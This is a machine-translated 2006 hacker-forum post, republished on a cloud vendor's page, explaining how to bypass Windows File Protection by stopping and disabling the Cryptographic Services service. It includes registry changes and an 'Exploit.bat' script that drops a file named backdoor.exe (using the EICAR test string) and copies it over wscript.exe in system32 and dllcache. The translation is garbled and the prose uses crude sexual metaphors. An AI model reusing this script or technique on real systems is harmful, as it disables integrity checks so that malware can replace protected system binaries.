Cut WFP's JJ easily [allyesno]

Source: Internet
Author: User

Author: allyesno

Team: freexploit

Date: 2006-01-20

I spent a lot of time writing articles that bypassed WFP protection last night. It turned out to be wrong. I felt very uncomfortable. I decided to challenge WFP again.

The thief first captured the king and the snake was about to take a 7-inch, so as long as we caught the small JJ of WFP, it would not be able to erect.

Who is the small JJ of WFP?


This protection mechanism is triggered when WFP receives a Directory change notification for the files in the protected directory. After receiving this notification, WFP determines the file to be changed. If this file is a protected file, WFP searches for the file signature in the directory file to check whether the new file version is correct. If the version of this file is incorrect, WFP replaces the new file with the files in the cache folder (if the file is in the cache folder) or the files in the installation source.

The small JJ of WFP is a directory file castrated. Basically, WFP is a waste of people.

How can we caster it? Please refer to the sunflower collection (msdn). to practice magic, you must first go to the palace. We know that there is a service in Windows called cryptographic services.

The role of this service is


Three management services are provided: the database catalog service, which determines the signatures of Windows files; the Protected Root Service, which adds and deletes the certificates of the Trusted Root Certificate Authority from this computer; and key service, which helps you register this computer to obtain a certificate. If this service is terminated, these management services cannot run properly. If this service is disabled, any service dependent on it cannot be started.

You can stop the service by killing it. net stop. Since the service is automatically enabled after the computer is restarted, SC is used to disable it.

Important Supplement:

XP SP2 and 2 k tests by luoluo

[16: 57] <luoluo> CS is cryptsvc. dll
[16: 58] <luoluo> run in svchost mode in Win XP
[] <Luoluo> This module can be found in the services process in Win 2000

Important addition:

After repeated tests, we found that the CS service and several features of WFP will be automatically enabled after the first shutdown.

(CS will not be automatically enabled after repeated start and stop)

So I think this is why envymask is testing in the pop-up box.

There are two solutions:

1. Use the replacement service proposed by luoluo to replace the CS service with other services, so the check function cannot be enabled even if the CS is started again.

2. Modify the Registry HKEY_LOCAL_MACHINE/system/controlset001/hardware profiles/0001/system/CurrentControlSet/Enum/root/legacy_cryptsvc/0000

0 is enabled
1 is disabled

To completely eliminate the CS service, we set the value to 1.

WFP only calls the CS service to detect the system files when they are deleted or replaced.

After the CS service is completed, the system file will not be changed when the CS service WFP is started again after the system file is deleted or replaced.

Therefore, WFP monitoring is dynamic.

Write a bat program to implement test pass in Win 2003.

Exploit. bat


@ Echo off
Rem cheat WFP check by allyesno
Rem my site:
Rem my email:
Echo plz waiting net stop to stop
Net stop "Cryptographic Services"
Echo plz waiting SC config this service
SC config "cryptsvc" Start = disabled
Echo x5o! P % @ AP [4/pzx54 (P ^) 7cc) 7} $ EICAR-STANDARD-ANTIVIRUS-TEST-FILE! $ H + H *> % SystemRoot %/system32/dllcache/backdoor.exe
Echo copy/Y % SystemRoot %/system32/dllcache/wscript.exe % SystemRoot %/system32/dllcache/wscript.exe. Bak
Copy/Y % SystemRoot %/system32/dllcache/wscript.exe % SystemRoot %/system32/dllcache/wscript.exe. Bak
Echo copy/Y % SystemRoot %/system32/dllcache/backdoor.exe % SystemRoot %/system32/dllcache/wscript.exe
Copy/Y % SystemRoot %/system32/dllcache/backdoor.exe % SystemRoot %/system32/dllcache/wscript.exe
Echo copy/Y % SystemRoot %/system32/dllcache/backdoor.exe % SystemRoot %/system32/wscript.exe
Copy/Y % SystemRoot %/system32/dllcache/backdoor.exe % SystemRoot %/system32/wscript.exe
Echo yeah we finished our work
Echo check the % SystemRoot %/system32/wscript.exe by Dir
Echo n u C the file size, good luck test by allyesno in win2003 n WINXP OS
Echo THX: Heze, envymask, 10, luoluo 4 Test

My site:

My email: (only receive text-only mail)

Thank you very much for the testing results of zex and envymask in win2003 and 10 in 2 K.

Supplement to the replacement service proposed by luoluo and testing in XP SP2



Http:// SCID = KB; ZH-CN; 222193

Http:// SCID = KB; ZH-tw; 282784

Http:// SCID = KB; ZH-CN; 222193

Attachment: exploit.rar [required0Community meta download]
This file has been downloaded 11 times.


Phantom Group
Phantom water 14335770
Pst project 16385798
IRC chat room + 9940 (SSL) # ph4nt0m # segfault + 61111 (SSL) # sigxfocus


Last edited by allyesno at pm

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.